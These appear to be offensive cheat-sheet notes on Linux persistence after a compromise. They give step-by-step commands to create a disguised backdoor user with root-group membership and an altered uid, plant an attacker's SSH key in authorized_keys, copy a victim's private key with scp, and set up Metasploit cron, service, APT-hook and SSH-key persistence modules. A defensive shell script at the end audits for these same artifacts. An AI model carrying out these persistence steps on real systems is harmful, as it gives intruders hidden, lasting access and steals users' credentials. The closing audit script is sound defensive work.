Create a backdoor user:

This creates a user:

useradd -m <username> -s <bash_shell>                        #E.g. useradd -m ftp -s /bin/bash

This changes the password of a user:

passwd <username>                                            #E.g.  passwd ftp   (passwd takes the username and then prompts for the new password)

To add this user to the root group (to inherit root group permissions):

usermod -aG <group_to_join> <new_user_to_group>              #E.g.  usermod -aG root ftp

Change the user id of the user (to make it look less suspicious):

usermod -u <user_id> <username>                              #E.g.  usermod -u 15 ftp

Change the Group id of the user:

usermod -g <group_id> <username>                             #E.g.  usermod -g 15 ftp

Persistence via SSH Keys:

1. Create a key pair and transfer the public key to the target:

⚠️ Assumes attacker already has access to the target system (via SSH, reverse shell, etc.)

Create the SSH key pair on the attacker machine:

ssh-keygen -t rsa -b 4096 -f ~/.ssh/evil_key

  • -t rsa: key type

  • -b 4096: 4096-bit key

  • -f ~/.ssh/evil_key: save private key to specified file

This produces two files:

  • evil_key (private key)

  • evil_key.pub (public key)

Append the public key (evil_key.pub) to ~/.ssh/authorized_keys of the target user; from then on you can log in with the private key.

2. Transfer the private key from the target to our machine:

Whenever an SSH key is generated with the default settings, two files are created under ~/.ssh in the user's home directory: id_rsa, which is the private key, and id_rsa.pub, which is the public key.

If we have an SSH connection we can copy the id_rsa key to our host machine with scp. The colon after the host separates it from the path of the file we want to download from that user's home directory:

scp <user>@<ip>:~/.ssh/id_rsa .

Then give the key the restrictive permissions ssh requires (it refuses a private key readable by others): chmod 400 id_rsa

Then we can ssh login without a password:

ssh -i id_rsa <user>@<ip>

Persistence via Metasploit (MSF) modules:

search platform:linux persistence

Module: exploit/linux/local/apt_package_manager_persistence
  This module will run a payload when the package manager is used. No handler is run automatically, so you must configure an appropriate exploit/multi/handler to connect. The module creates a pre-invoke hook for APT in apt.conf.d. The hook name syntax is numeric followed by text.

Module: exploit/linux/local/cron_persistence
  This module will create a cron or crontab entry to execute a payload. The module includes the ability to automatically clean up those entries to prevent multiple executions. syslog will get a copy of the cron entry.

Module: exploit/linux/local/service_persistence
  This module will create a service on the box and mark it for auto-restart. We need enough access to write service files and potentially restart services.

Module: post/linux/manage/sshkey_persistence   # BEST METHOD
  This module will add an SSH key to a specified user (or all), to allow remote login via SSH at any time.

set CREATESSHFOLDER true
set SESSION <session_id>

Then save the SSH key the module gives you into a file and restrict its permissions:

chmod 400 ssh_key

Then log in with SSH:

ssh -i ssh_key root@<ip>
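A defender's audit of the artifacts the techniques above leave behind, added here as an example that is not part of the original notes or of Metasploit: it reports the group and uid/gid changes from the backdoor-user section, lists authorized_keys entries from the SSH-key section, and finds the apt.conf.d hooks the apt_package_manager_persistence module plants. Every path is a parameter so the checks also run on copied files; the script name persistence_audit.sh is assumed, and the options-field handling for authorized_keys assumes no spaces inside the options.

```shell
#!/bin/sh
# Audit for the persistence artifacts described above: accounts added to group
# root or given uid/gid 0, unexpected authorized_keys entries, and APT
# Pre/Post-Invoke hooks in apt.conf.d. Every path is a parameter so the checks
# also run against copied files (e.g. from a disk image); defaults are live paths.

# Supplementary members of group root, plus any non-root account whose uid or
# primary gid is 0 (the "usermod -aG root" and uid/gid changes shown above).
suspicious_root_accounts() {
    passwd_file="${1:-/etc/passwd}"
    group_file="${2:-/etc/group}"
    awk -F: '$1 == "root" && $4 != "" {
        n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i] " (member of group root)"
    }' "$group_file"
    awk -F: '$1 != "root" && ($3 == 0 || $4 == 0) { print $1 " (uid=" $3 " gid=" $4 ")" }' "$passwd_file"
}

# One "<key type> <comment>" line per key in an authorized_keys file, so a key
# whose comment names an unfamiliar user@host stands out. A leading options
# field (from="...",command="..., assumed space-free) is skipped when present.
list_authorized_keys() {
    awk 'NF == 0 || $1 ~ /^#/ { next }
         { i = ($1 ~ /^(ssh-|ecdsa-|sk-)/) ? 1 : 2
           c = ""; for (j = i + 2; j <= NF; j++) c = c (c == "" ? "" : " ") $j
           line = $i " " (c == "" ? "(no comment)" : c); print line }' "$1"
}

# APT hook directives that execute a command around package operations; the
# apt_package_manager_persistence module plants one of these in apt.conf.d.
apt_hooks() {
    grep -Hi -E 'Pre-Invoke|Post-Invoke' "${1:-/etc/apt/apt.conf.d}"/* 2>/dev/null
}

# Full audit of the live system:  sh persistence_audit.sh audit
if [ "${1:-}" = "audit" ]; then
    echo "== root-equivalent accounts"; suspicious_root_accounts
    for f in /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys; do
        [ -f "$f" ] && { echo "== $f"; list_authorized_keys "$f"; }
    done
    echo "== APT hooks"; apt_hooks
fi
```

Each function also works on files pulled from an image, e.g. suspicious_root_accounts ./evidence/passwd ./evidence/group.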